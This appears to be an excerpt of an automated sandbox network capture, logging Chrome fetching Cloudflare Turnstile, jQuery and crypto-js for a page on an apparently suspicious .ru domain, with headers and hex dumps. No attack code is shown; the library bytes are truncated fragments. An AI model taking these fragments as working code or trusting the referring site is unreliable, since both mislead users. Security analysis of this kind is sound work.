                                                          2025-01-16 04:17:30 UTC1369INData Raw: 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 6c 6d 61 55 6c 4f 52 32 39 72 5a 45 67 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30
                                                          Data Ascii: ZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2lmaUlOR29rZEggLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449744104.18.94.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:31 UTC647OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:31 UTC386INHTTP/1.1 302 Found
                                                          Date: Thu, 16 Jan 2025 04:17:31 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                          cross-origin-resource-policy: cross-origin
                                                          location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bdca8b942d2-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449743151.101.130.1374432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:31 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                          Host: code.jquery.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:31 UTC611INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 89501
                                                          Server: nginx
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                          ETag: "28feccc0-15d9d"
                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Accept-Ranges: bytes
                                                          Age: 2485578
                                                          Date: Thu, 16 Jan 2025 04:17:31 GMT
                                                          X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890062-NYC
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 55, 0
                                                          X-Timer: S1737001052.616903,VS0,VE1
                                                          Vary: Accept-Encoding
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                          2025-01-16 04:17:31 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449745104.17.25.144432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:31 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                          Host: cdnjs.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:31 UTC958INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:31 GMT
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=30672000
                                                          ETag: W/"61182885-40eb"
                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                          cf-cdnjs-via: cfworker/kv
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Timing-Allow-Origin: *
                                                          X-Content-Type-Options: nosniff
                                                          CF-Cache-Status: HIT
                                                          Age: 658862
                                                          Expires: Tue, 06 Jan 2026 04:17:31 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LldVejRnmxV3l5wwy%2FmYjSlAPOxC19qXHw1E1dqfJTGUyqSXAvdR9mhrTXZV18psTHuhwZgsJQIDgENeGPXZd%2B%2BleJRShN2MEAqaygAR9gzhEwYxyzJadtNKIEd4j3XZg6ro7V6I"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=15780000
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bdcde844316-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:31 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                          Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                          Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                          Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                          Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
